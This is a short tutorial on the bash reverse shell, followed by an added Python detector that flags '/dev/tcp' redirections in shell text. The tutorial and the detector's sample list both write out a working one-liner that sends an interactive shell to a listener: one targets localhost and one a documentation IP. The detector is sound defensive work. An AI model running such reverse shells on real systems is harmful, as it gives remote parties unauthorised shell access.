It’s a(n insecure) remote shell introduced by the target. That’s the opposite of a “normal” remote shell, which is introduced by the source.
Let’s try it with localhost instead of
- Open two tabs in your terminal.
- Open TCP port 8080 and wait for a connection: nc localhost -lp 8080
- Open an interactive shell, and redirect the IO streams to a TCP socket: bash -i >& /dev/tcp/localhost/8080 0>&1 where
  - bash -i: “If the -i option is present, the shell is interactive.”
  - >&: “This special syntax redirects both, stdout and stderr to the specified target.”
  - (argument for
  /dev/tcp/localhost/8080 is a TCP client connection to
  - 0>&1: redirect file descriptor 0 (stdin) to fd 1 (stdout), hence the opened TCP socket is used to read input.
- Rejoice as you have a prompt in tab 1.
- Now imagine not using localhost, but some remote IP.
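
Seen from the defending side, the one-liner above has a recognisable shape: a redirection aimed at /dev/tcp, an interactive shell, and stdin duplicated from stdout. The following is an added example, not part of the original page, that checks lines of shell text (history files, scripts, the string handed to bash -c) for that shape; the function names, severity labels and sample lines are constructed for illustration.

```python
import ipaddress
import re

# A redirection operator (>, <, >&, &>, <>) aimed at bash's /dev/tcp or /dev/udp pseudo-device.
SOCKET_REDIR = re.compile(r"[<>]&?\s*/dev/(tcp|udp)/([^/\s]+)/(\d{1,5})")
# stdin duplicated from stdout (0>&1 or 0<&1): the socket now also feeds the shell's input.
STDIN_DUP = re.compile(r"\b0[<>]&1(?!\d)")
# bash or sh started with an option cluster containing -i (interactive).
INTERACTIVE = re.compile(r"\b(?:ba)?sh\s+(?:-\w+\s+)*-\w*i")


def is_loopback(host):
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:  # a DNS name other than localhost
        return False


def analyze(line):
    """Return a finding dict for one line of shell text, or None if it has no socket redirection."""
    m = SOCKET_REDIR.search(line)
    if m is None:
        return None
    two_way = bool(STDIN_DUP.search(line))
    interactive = bool(INTERACTIVE.search(line))
    return {
        "proto": m.group(1),
        "host": m.group(2),
        "port": int(m.group(3)),
        "loopback": is_loopback(m.group(2)),
        # high: interactive shell with stdin, stdout and stderr all on the socket
        "severity": "high" if interactive and two_way else "medium",
    }


# Constructed sample lines; 192.0.2.10 is a documentation-only address (RFC 5737).
SAMPLES = [
    "bash -i >& /dev/tcp/localhost/8080 0>&1",
    "bash -i >& /dev/tcp/192.0.2.10/8080 0>&1",
    "echo ping > /dev/tcp/127.0.0.1/9000",
    "nc localhost -lp 8080",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(analyze(s), "<-", s)
```

The redirection never appears in the argument list of the bash process itself, because the shell consumes it before exec, so this check belongs on text that a shell is about to interpret.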